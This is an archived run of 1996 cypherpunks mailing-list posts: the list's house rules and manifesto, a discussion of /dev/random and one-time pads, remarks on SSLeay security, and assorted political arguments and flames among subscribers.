 * Further background information on this topic may be obtained from
 * RFC 1750, "Randomness Recommendations for Security", by Donald
 * Eastlake, Steve Crocker, and Jeff Schiller.
 */
- ----END random.c EXCERPT----

This answer your question?

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

        "Evil does seek to maintain power by suppressing the truth."
        "Or by misleading the innocent."
                -- Spock and McCoy, "And The Children Shall Lead",
                   stardate 5029.5.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMp2wWTCdEh3oIPAVAQGXDwf9F8OyHkVFGBDtb2mXrkYy89KewH9uylVS
VQAmEwxAggAC/C/FbhhXcQNWVCCmcRCvXFMXtZmxnc5dP2/Hn+kzAJuXjBJLA8bO
EcgWTGYCuyoZhXcon63FCW1EXg8/9qakfb66B3kc+tsx5UVbSlbzk4wfNPAzXWFE
V1ASeaoE708Dd/FN+2DODyFXssJ4aVxDYm8tv07AD7WYT4rbW896om0nKynj1DCW
xgA9+GVs37El2gMhz9j7sS3WouFnEckCmXuUWKzSUBGA68T5eJqSRywOs0ePgPQi
+t6KABJ20TEQX4u8wAvdg/F58B4wZZPcE66IAIITeDQm+uE+a5NilA==
=9zj/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Thu, 28 Nov 1996 06:54:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: The House Rules At The Permanent Virtual Cypherpunks Party
Message-ID: <199611281454.PAA12144@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Here is a document I just hacked.  I am breaking several of the
Rules by posting it, since I am not actually subscribed to
cypherpunks right now.


Enjoy.


Bryce


- -------


0.  Hello

Welcome to the cypherpunks mailing list!  Starting now, you
will receive hundreds of email letters every week on the
subject of privacy and social change in an age of cryptographic
networks.


PLEASE, for everyone's sake, SAVE THIS MESSAGE!


If you ever want to remove yourself from this mailing list, 
you can send mail to <majordomo@toad.com> (NOT
<cypherpunks@toad.com>) with the following command (correctly 
spelled) in the body of your e-mail message:

    unsubscribe cypherpunks Their Name <them@theiraddress.xxx>

Here's the general information for the list you've subscribed 
to, in case you don't already have it:



I.  Etiquette -- The House Rules At The Virtual Cypherpunks Party

The Meta-Rule:  It's John Gilmore's virtual house.  He is the 
sole owner of the computer (toad.com) that hosts cypherpunks 
and the sole authority over what the users of that computer 
(you) can do with it.


Rule 1:  Do not _ever_ send email to the list 
<cypherpunks@toad.com> asking how to accomplish some 
administrative task like unsubscribing yourself.  If you do,
you will be roundly flamed, and nobody will answer your
question.  Instead, send email to <majordomo@toad.com>, or read
the "Administrivia" section below.

Rule 2:  Don't forward articles from other forums to
cypherpunks.  We can find it ourselves the same place you did
if we want to read it.  If you have something useful to say 
about the article, then consider writing a review of the 
article or a response to it and posting _your_ article along 
with a pointer to the original article.

Rule 3:  Don't cross-post articles to cypherpunks as well as to
other lists.  

Rule 4:  Read before you post.  If you are new, don't post at
_all_ until you have read a few weeks of discussion.

Rule 5:  When replying to a message, ask yourself if more than
a thousand other subscribers really need to see your response,
or if is more appropriate to reply privately.

Rule 6:  Don't ask questions which are already answered in the
resources described below.  How can you know whether your
question is already answered in those resources?  Simple:  read
them.

Rule 7:  Don't publically reply to someone just to flame
him/her because it makes you feel better.  We are not here to
make you feel better; we are here to read quality discussion
about certain issues.  Some people actually _specialize_ in 
tempting their adversaries into publically flaming them.  
Don't be a stooge by falling for it.


Advice:

The cypherpunks list is not designed for beginners, although
they are welcome.  If you are totally new to crypto, please 
get and read the crypto FAQs referenced below.  These 
documents are a good introduction.  Crypto is a subtle field 
and a good understanding will not come without some study.  
Please, as a courtesy to all, do some reading to make sure 
that your question is not already frequently asked.

We've noticed that people who post a lot usually have less to 
say.  Refrain from contributing too much.

Re-read your article before your send it.  Then re-read it
again.  I'm serious-- go back over it _twice_.  Really.  It 
helps.

Assume any message from you to the list, no matter how 
insignificant or casual, is archived somewhere for eternity 
for future employers and acquaintances to read (it probably 
is).  You may even wish to unsubscribe right now and then 
re-subscribe under a "nym," rather than using your true name, 
if your views are especially controversial or your job 
prospects are sensitive.



II.  Administrivia -- How To Unsubscribe And Stuff


If you don't know how to do something, like unsubscribe, send mail to

        majordomo@toad.com

and the software robot which answers that address will send you back 
instructions on how to do what you want.  If you don't know the majordomo 
syntax, an empty message to this address will get you a help file, as will a 
command 'help' in the body.  Even with all this automated help, you may 
still encounter problems.  If you get really stuck, please feel free to 
contact me directly at the address I use for mailing list management:

        cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint: if 
you try to unsubscribe yourself from a different account than you signed up 
for, it likely won't work.  Log back into your old account and try again.  
If you no longer have access to that account, mail me at the list management 
address above.  Also, please realize that there will be some cypherpunks 
messages "in transit" to you at the time you unsubscribe.  If you get a 
response that says you are unsubscribed, but the messages keep coming, wait 
a day and they should stop.

For other questions, my list management address is not the best place, since 
I don't read it every day.  To reach me otherwise, send mail to

        eric@remailer.net (Is Eric still doing this?)

This address is appropriate for emergencies (and wanting to get off the list 
is never an emergency), such as the list continuously spewing articles.  
Please don't send me mail to my regular mailbox asking to be removed; I'll 
just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
majordomo address is made exactly for this purpose.

To post to the whole list, send mail to

        cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list. Nothing 
personal, but I have to look at all the bounce messages.

[There is no digest version available.] (We should put in info here about 
subscribing to Alan's digest at gateway.com and the 2(?) filtered versions 
of the list here. Does someone have all that?)

There is an announcements list which is moderated and has low volume. 
Announcements for physical cypherpunks meetings, new software and important 
developments will be posted there.  Mail to

        cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All announcements 
also go out to the full cypherpunks list, so there is no need to subscribe 
to both.



III.  About Other Forums

There are other forums to use on the subject of cryptography.  The Usenet 
group sci.crypt deals with technical cryptography; cypherpunks deals with 
technical details but slants the discussion toward their social 
implications.  The Usenet group talk.politics.crypto, as it says, is for 
political theorizing, and cypherpunks gets its share of that, but 
cypherpunks is all pro-crypto; the debates on this list are about how to 
best get crypto out there.  The Usenet group alt.security.pgp is a 
pgp-specific group, and questions about pgp as such are likely better asked 
there than here.  Ditto for alt.security.ripem. If you are beginning to use 
PGP and have questions, you can also subscribe to the PGPusers list by 
sending mail to pgp-users-request@rivertown.net with a subject of subscribe, 
or as an alternative way to subscribe use their Web Mailing List Gateway at 
http://pgp.rivertown.net/#Subscribe



IV.  About Net.Loons On cypherpunks

The cypherpunks list has attracted a fair number of net.loons 
in its day.  If you see an inflammatory article that seems too
crazy to be serious, then it probably is.

The hallmark of these loons is rudeness, and the preferred 
policy in just to ignore their postings (tempting as it is to 
respond).  Replies have never, ever, not even once resulted in
anything constructive and usually create huge flamewars on the
list.  Please, please, don't feed the animals.



V. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is good online intro to crypto.  Very much worth 
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany. There is 
a glossary there that all new members should download and read.  Also 
recommended for all users are Hal Finney's instructions on how to use the 
anonymous remailer system; the remailer sources are there for the 
perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An excellent 
overview of the field, it describes many of the basic algorithms and 
protocols with their mathematical descriptions.  Some of the stuff at the 
edges of the scope of the book is a little incomplete, so short descriptions 
in here should lead to library research for the latest papers, or to the 
list for the current thinking.  All in all, a solid and valuable book.  It's 
even got the cypherpunks-request address.

D. For a more technical, lower volume, and much less policy-politics 
oriented list, you might try to subscribe to the coderpunks list, which 
branched off of cypherpunks some time ago, due to frustration with loons. It 
also runs at toad, and you can be considered for subscription by sending 
mail to Majordomo@toad.com with these words in the body of the message: 

subscribe coderpunks Their Name <them@theiraddress.xxx>

E. The Snake Oil FAQ, by Matt Curtin & others, located at:

   http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html

Has some useful warning signs to keep in mind. "Snake Oil," here, means 
"weak cryptography," which brings us to...

F. An incomplete cypherpunks translation list:

PGP -- Pretty Good Privacy software.
PRZ -- Philip R. Zimmermann, PGP's author.
GAK -- Government Access to Keys (for crypto, but it might as well be for 
your front door).
KRAP -- Key Recovery Access Program (a brand new flavor of GAK).
TLAs -- Three Letter Agencies (the alphabet soup of the US government -- 
FBI, DEA, IRS, CIA, DIA, NRO, ATF, NSA -- all your favorites).
NSA -- the US National Security Agency in Fort Meade, Maryland, responsible 
for encryption codes and computer security for the entire US government.
LEAs -- Law Enforcement Agencies (see above, at least when they're not busy 
breaking the law themselves...).
ITAR -- International Traffic in Arms Regulations. A silly US government 
regulation outlawing the "export" of strong cryptography software which is 
all over the planet anyway.

[Please suggest other resources and acronyms.]



IV. Famous last words

My preferred e-mail address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

[From here on I changed/added nothing (it's gospel, after all:). -- JMR]
- ----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated 11/28/95]



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMp2nikjbHy8sKZitAQGoiQMAgAfvKA0751PAW6ivMQ0+KQfa19cuueFY
VqPWxJSMXBE+8v37+sx6nn7FN/qFYkoccaBkOJdOZb7zu2kX+ptV/T153F6cFFFT
6RULRhMKQOiWB7JV+fdr2QV136hR8U/1
=AKDO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@stallion.ee>
Date: Thu, 28 Nov 1996 06:12:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Israel crypto restrictions
In-Reply-To: <R053XD11w165w@bwalk.dm.com>
Message-ID: <Pine.GSO.3.95.961128160804.11147C-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Adam Shostack <adam@homeport.org> writes:
> > 	They're listed on NASDAQ (CKP).  This makes them an American
> > company for purposes of export controls.  (This from an employee of
> > Checkpoint who I asked that exact question.)
> 
> This is truly bizarre. First, if they were on the NASDAQ, they'd have a
> 4-letter ticker symbol, not a 3-letter symbol. MSFT (Microsoft) is on NASDAQ.
> IBM (IBM) and F (Ford) are on the New York stock exchange and/or
> American stock exchange.

The actual ticker symbol for Check Point Software Technologies Ltd. is
CHKPF.

Juri Kaljundi
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Thu, 28 Nov 1996 16:27:33 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Is /dev/random good enough to generate one-time pads?
Message-ID: <Pine.BSF.3.91.961128153422.182A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> > Subj sez it all.
> Yes, as a matter of fact it is.  /dev/random is based on an entropy pool
> taken from hardware interrupts and such, thus is a RNG, not a PRNG

I expect it would be "good enough", but it is not _perfectly_ random, and 
so it wouldn't be a true one-time pad.

Because it uses MD5, the bits are not all provably independent. You get 
(very strong) cryptographic security instead of perfect security.

The one-time pad is easy to explain in theory, but implementing it
perfectly is extremely difficult. Many people believe that quantum events
are the only source of perfect randomness, but most methods for harvesting
that randomness could introduce statistical properties. For example, a
radioactive substance may have exactly a 50% chance of emitting a particle
given a certain amount of time, but what happens if your timer isn't
perfect? 

One-way hashes are good at removing such obvious and not-so-obvious
statistical properties, but like a PRNG, you can't prove that the bits it
produces are all completely independent. It's definately "good enough",
but it's not perfect. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 28 Nov 1996 15:10:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199611281454.PAA12144@digicash.com>
Message-ID: <N3i5XD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce <bryce@digicash.com> writes:
> The Meta-Rule:  It's John Gilmore's virtual house.  He is the
> sole owner of the computer (toad.com) that hosts cypherpunks
> and the sole authority over what the users of that computer
> (you) can do with it.

Since John Gilmore and his sexual preferences are discussed so much on
this mailing list, you really should say a few more words about him.

Like, mention that John is a liar and a content-based censor.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 17:14:38 -0800 (PST)
To: jbugden@smtplink.alis.ca
Subject: Re: IQ and age
In-Reply-To: <9610288492.AA849213618@smtplink.alis.ca>
Message-ID: <329E38E2.4585@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:
> Clay Olbon II <olbon@ix.netcom.com> wrote:
> >Seriously, you ignore the correlation between performance in college and
> >standardized test scores.  There is a reason these are used in admissions - they
> >are actually pretty good predictors of the ability to perform college level
> >work.

> This is a commonly held fiction that is not supported by the evidence. As stated
> in another message, the infomration given out by ETS, who administer the GMAT
> and SAT, indicate that there is a low correlation between GMAT scores and
> successful completion of even first year education programs. This also ignores
> the issue of why other, better, widely available predictors are not used
> instead.

> >Oh, I forgot.  Only certain racial/ethnic groups are capable of understanding
> >basic mathematical concepts. <

> There was a good Scientific American article on cultural influences on learning
> within the last year or two. It examined Asian groups noted achievements in
> tests and the parental and cultural support for scholastic achievement.
> Another anecdotal example is in the opening chapters of "Surely You're Joking,
> Mr. Feynman" by Richard Feynman, the late Caltech professor and general bon
> vivant. He describes how his mother introduced a doctor, a general and a
> professor with the same respectful tones indicating to him that a career in
> academia was as highly valued as any other high position in society.

Speaking of Feynman (who was not only a scientific genius, but was rather
shrewd in his personal judgements as well), when approached by David Lifton
(I believe) on the subject of the sudden large-volume displacement of JFK's
upper torso in the fatal head shot, Feynman found a subtle inconsistency
in the frames of the film, and thereby excused himself from rendering an
opinion.

For comparison, when Allen Dulles was confronted directly with the same
evidence, he said "I don't see any backward movement".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 19:25:08 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Anon
In-Reply-To: <199611281629.LAA21815@homeport.org>
Message-ID: <329E3E80.6CB6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> Brin's argument has two ideas that I find annoying.  One is that the
> changes he forsees are inevitable, the other is that security
> is not about economics.
> The idea that universal surveillance is inevitable is based on
> the assumption that everyone lives in a city, and the technologies of
> spying can be cheaply deployed.  A good deal of privacy can be
> obtained by moving a small or large distance away.  Monitoring
> technology is not cheap.  When it is cheap, the network links to
> connect it all will still be expensive.  (etc.  The economics of a
> surveillance state lead to something in the mix, people, cameras,
> policemen to make arrests etc, being expensive.)

[snippo]

The rich, whether living alone or in an enclave, will have security
technology several generations behind Big Brother.  But then, Big Bro'
is not just one agency.  The NSA will be able to monitor the rich 100%
no matter what they do, whereas the FBI (in 1996 for example) will not
be so well equipped.

As far as the unit cost of surveillance goes, it's cheaper every day.
Hard disk (and other storage) space is way, way up per dollar, processing
speeds and I/O are improving greatly per dollar, and the type of custom
database software and O/S employed by the top surveillance pros is not
at all analogous to the stuff most people use on Unix, DOS, or other
common small computer systems.  I did some pioneer work in high-speed
database work, and the software makes a BIG difference in unit cost of
surveillance.

Sometimes, when ordinary controls don't work because specific groups of
people put up more than the normal amount of resistance, stronger measures
are employed to counter the resistance, i.e., Willie Williams bombing the
Move neighborhood in Philly, Reno burning down the Waco "compound", or
W.T. "Burn-'em" Sherman making his point in Georgia (USA).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 19:24:49 -0800 (PST)
To: bryce@digicash.com
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <199611281454.PAA12144@digicash.com>
Message-ID: <329E4432.4D93@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryce wrote:
> Here is a document I just hacked.  I am breaking several of the Rules
> by posting it, since I am not actually subscribed to cypherpunks
> right now.
> Welcome to the cypherpunks mailing list!  Starting now, you will
> receive hundreds of email letters every week on the subject of
> privacy and social change in an age of cryptographic networks.

[snip]

> I.  Etiquette -- The House Rules At The Virtual Cypherpunks Party
> The Meta-Rule:  It's John Gilmore's virtual house.  He is the
> sole owner of the computer (toad.com) that hosts cypherpunks
> and the sole authority over what the users of that computer
> (you) can do with it.

[mo' snip]

Ordinarily, I'd leave this post alone, but I really hate it when people
twist ideas for their own philosophical purposes.  To whit: "John is the
sole authority over what the users of his computer can do with his
computer" (quote approximate).

I don't *do* anything with *his* computer. I send email into the ether
with an address on it, and he picks it up at his discretion and does
what he wants with it.  I am in no way involved in that process, and I
do not share *any* responsibility for how he handles the email. As far
as his authority goes, I've been subscribed for several months now, and
I don't recall a single statement by Gilmore himself as to what this
"authority" thing means.  But then, why should he, and why should you?
It's patently obvious to anyone with a brain, and we don't need some
authoritarian boot-licking computer-bureaucrat telling us how it is.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 29 Nov 1996 07:26:41 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Counterproductive Dorothy Denning Flames
Message-ID: <849280424.615121.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> So, they feel compelled to harrass anyone who's smarter / more
> knowledgeable than they are (sometimes using the anonymous remailers) in
> an effort to drive all intelligent discussion off their "private mailing
> list", so ignoramuses like Bradley can sound like "local experts".

I think you might be missing the very succinct and subtle point that 
all you ever contributed to this list (despite your knowledge of 
cryptography) was rants about sovok jews and Tim Mays sexual 
orientation. I happen to be knowledgable about cryptography but even 
if I`m not an expert I do tend to post things that are of value and 
interest as opposed to worthless flames.


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 19:24:56 -0800 (PST)
To: Dave Kinchlea <security@kinch.ark.com>
Subject: Re: wealth and property rights
In-Reply-To: <Pine.LNX.3.95.961127123103.550D-100000@kinch.ark.com>
Message-ID: <329E4B60.5FDD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dave Kinchlea wrote:
> On Wed, 27 Nov 1996, Clay Olbon II wrote:
> > The average welfare benefit (including food stamps, medicaid, and all the
> > other myriad programs) is $10/hr.  Compare to a minimum wage of $5/hr.
> > Offer most welfare recipients a minimum wage job and they will laugh in your
> > face.  (In fact, here in Michigan most employers are already paying several
> > $$ above minimum wage, and often these jobs are unfilled).

> I am not in a position to argue with you, I simply don't have the facts.
> My question is, do You? can you cite where this figure came from, it
> sounds like Republican rhetoric to me. Of course, I will point out, that
> minimum wage is simply not enough to feed a family. It is (or at least
> it should be) reserved for single folks just starting out.

[snip]

Sorry for the extra mail, but I couldn't resist.  At age 12, in a family
of 7, my father lost his salaried job at Goodyear corporate HQ, and we
went on welfare for awhile.  I can tell you for a fact that both then and
now, welfare is worth *more* than $10/hour, if you have a family.

We not only got lots of food free from the govt. food warehouse, but they
took care of the other annoyances to some extent.  Some help was county
welfare, some federal.  Then, when my father didn't go back to the gravy
job, my mother got a good job with (you guessed it) the county welfare
dept., got a good supervisor position, and has retired with a nice pension.

Today I'm a well-paid computer programmer, and yet once again I'm on the
receiving end of welfare benefits (you would not believe how many there
are) in a round-about way, which I can't explain for obvious reasons.

Problem is, even though I can see billions going to people who don't need
the money, I can't think of a solution that could be evaluated as *fair*
by the people who pay for the system.  To suggest that we could support
people only when they *really* need the help would be to suggest what,
bread lines, maybe, instead of a check in the mailbox every so often?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Thu, 28 Nov 1996 12:10:57 -0800 (PST)
To: geeman@best.com
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
In-Reply-To: <3.0.32.19961128085237.0069afc0@best.com>
Message-ID: <9611281907.aa27702@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


geeman@best.com wrote:
> 
> At 07:12 AM 11/27/96 +0000, you wrote:
> .....etc
> Can you be more specific?
> What are the vulnerabilities you are aware of?

I think I would discuss this with the author before going public, to give
him the usual opportunity to clean up before all hell breaks loose. However,
that is what I'd call "work" rather than "fun", so I'd want paying for it.

No doubt I'll take it up with Eric at some point, when neither of us has
anything better to do.

My impression is that Eric is more interested in speed and functionality than
strict security (and considering the incredible vulnerability that is more or
less inherent in an SSL implementation, I feel the same). I could be wrong, of
course.

I will say that I'm not aware of any problems that a good firewall and physical
security don't take care of. That isn't to say there aren't any - I haven't
looked that hard.

Cheers,

Ben.

> 
> >I've never seen a security review of SSLeay, and if anyone gave it a clean
> bill
> >of health, they didn't have their eye on the ball. Note, I'm not knocking
> >SSLeay here, it is a wonderful lump of code, but it hasn't been written with
> >security in mind (IMHO).
> >
> >Cheers,
> >
> >Ben.
> >
> >-- 
> >Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
> >Freelance Consultant and  Fax:   +44 (181) 994 6472
> >Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
> >A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
> >London, England.          Apache-SSL author
> >
> >

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 19:24:51 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: wealth and property rights
In-Reply-To: <199611271638.KAA30991@mailhub.amaranth.com>
Message-ID: <329E55E4.21D0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
>    at 12:18 PM, jc105558@spruce.hsu.edu said:

[snippo]

> socialist/communist are theifs; plain & simple. They beleive they have the
> right to steal from one to give to another.
> capitalists beleive in an exchange in property/services at a rate the
> market will bare.
> socialists example: You have somthing I want/need & I am going to take it
> from you.
> capitalists example: You have somthing I want/need what can I give you in
> exchange.
> socialism uses FORCE to take what it wants while the capitilism you have a
> free & volintary exchange.

Close, but the cigar doesn't burn long enough.  Capitalism, as said by
one who knows, is as much an enemy (well, almost) of Free Enterprise as
is Socialism, due to Capitalism rewarding monopolies as they do, with
their Golden Parachutes et al discouraging real investment on the part
of most corporate "leaders".

Just don't confuse "Free Trade" with "Free Enterprise".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Reece <reece@taz.nceye.net>
Date: Thu, 28 Nov 1996 11:39:46 -0800 (PST)
To: deviant@pooh-corner.com
Subject: Re: Is /dev/random good enough to generate one-time pads?
In-Reply-To: <Pine.LNX.3.94.961128152339.1435A-100000@random.sp.org>
Message-ID: <19961128194007.12992.qmail@taz.nceye.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Thu, 28 Nov 1996 15:31:28 +0000 (GMT)
   From: The Deviant <deviant@pooh-corner.com>

   On Wed, 27 Nov 1996, Igor Chudov @ home wrote:

   > Subj sez it all.
   > 
   > Thank you.
   > 
   > 	- Igor.

   Yes, as a matter of fact it is.  /dev/random is based on an entropy pool
   taken from hardware interrupts and such, thus is a RNG, not a PRNG (thats
   right IPG, Linux uses hardware to get random numbers... imagine that!).
   /dev/urandom is, however, a PRNG...

Only if you try to pull out more bits than you can get from /dev/random.

Note that /dev/random on a single-user system doesn't generate bits
fast enough to be practical for OTP generation (try od -tc1
/dev/random sometime; you'll get about 512 bytes if you haven't used
it lately, then reads will block until enough unpredictable things
happen ).  Of course, you can add more randomness sources.

How good a source would a radio or diode noise source connected to the
parallel port's IRQ input be?  It certainly sounds like it would be
cheap enough.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Thu, 28 Nov 1996 17:02:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
In-Reply-To: <9611281907.aa27702@gonzo.ben.algroup.co.uk>
Message-ID: <199611290102.UAA13822@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
> 
> I think I would discuss this with the author before going public, to give
> him the usual opportunity to clean up before all hell breaks loose. However,
> that is what I'd call "work" rather than "fun", so I'd want paying for it.

Translation:  You don't really know what you are talking about.

> My impression is that Eric is more interested in speed and functionality than
> strict security (and considering the incredible vulnerability that is more or
> less inherent in an SSL implementation, I feel the same). I could be wrong, of
> course.

How is any security hole inherent in an SSL implementation?  The
protocol itself may not give you everything you need, but regardless
of whether or not the protocol is useable for any given task (or any
task at all), nothing precludes a secure implementation.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Thu, 28 Nov 1996 13:26:53 -0800 (PST)
To: "Kathleen M. Ellis" <tgkelli@tiger.towson.edu>
Subject: KUDOS to Kathleen: [Re: Dorthy Denning is a boot-licking fasicist!!!]
In-Reply-To: <Pine.SGI.3.93.961128125719.27120A-100000@tiger.towson.edu>
Message-ID: <199611282127.OAA10714@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SGI.3.93.961128125719.27120A-100000@tiger.towson.edu>, on 11/28/96 
   at 01:46 PM, "Kathleen M. Ellis" <tgkelli@tiger.towson.edu> said:

::[snip]
::A brief word on abuse... by calling Gilmore or anybody else a "faggot"
::doesn't win me over to your cause, as is the case with many others on
::the cypherpunks list.  Further, while I may not agree with Dr. Denning's
::perspective on these issues, I respect her as a writer, a cryptographer,
::and as a computer scientist.  I also (groan if you must)  admire her as
::a woman who has maintained such a high-profile position in such a
::religious debate, given that she probably gets mail like yours all the
::time. 
::
-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------

        good, solid statement of purpose which too few of us practice. 
    it is general human nature to be protective (usually in a jealous 
    sense) of our nurtured opinions. However, that is not an excuse to 
    be abusive of another.  

        It is one thing to be vituperatively demonstrative, another to 
    criticize anothers view point by epithetical allegorations, and 
    another, with careful consideration, to disagree with _civilized_
    clinically definable examples which delineate your viewport.

        ...but I always make an exception for sarcasm!

    or, as I have said before:

    "Profanity is a crutch for inarticulate motherfuckers.
      but profanity is occasionally condonable as enlightened punctuation."
            --attila

    of course,

        "Violence is the last refuge of the incompetent."
                --Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMp4DN704kQrCC2kFAQGknAQAuC9PsS2HkXVp0ZdVjd3clWXn7P4F16RQ
oHK6TDeWpUs1+ZxEoP6rSyyPjBOT/nJv4yi/uRu8wkIdLEyvb/JCHu/jWSnobr3C
H74oCh9O1UOMMmFxJ4/UrJB1MCb0ZyN9EqlAFYdz0kGdW7MP9R0dkzl7LLalokhT
TP1jEd6gnXs=
=d/cZ
-----END PGP SIGNATURE-----

--
  without arms they do not resist; 
    without communication they know not what to resist.
        -attila




